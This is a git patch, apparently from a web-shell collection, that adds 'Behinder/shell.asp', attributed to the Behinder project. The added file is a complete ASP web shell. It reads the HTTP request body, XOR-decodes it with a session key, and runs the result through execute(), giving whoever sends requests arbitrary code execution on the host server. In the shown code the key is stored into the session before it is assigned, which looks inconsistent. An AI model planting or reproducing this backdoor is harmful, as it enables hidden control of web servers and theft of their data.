From 05e2ea5d8984bea46344027ad99bd368b402bef6 Mon Sep 17 00:00:00 2001 From: tennc <670357+tennc@users.noreply.github.com> Date: Tue, 18 Aug 2020 21:11:13 +0800 Subject: [PATCH] add shell.asp with Behinder MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit from : https://github.com/rebeyond/Behinder author: rebeyond 👍 --- Behinder/shell.asp | 11 +++++++++++ 1 file changed, 11 insertions(+) create mode 100644 Behinder/shell.asp diff --git a/Behinder/shell.asp b/Behinder/shell.asp new file mode 100644 index 0000000..1a23fa6 --- /dev/null +++ b/Behinder/shell.asp @@ -0,0 +1,11 @@ +<% +Response.CharSet = "UTF-8" +Session("k")=k +k=Session("k") +size=Request.TotalBytes +content=Request.BinaryRead(size) +For i=1 To size +result=result&Chr(ascb(midb(content,i,1)) Xor Asc(Mid(k,(i and 15)+1,1))) +Next +execute(result) +%>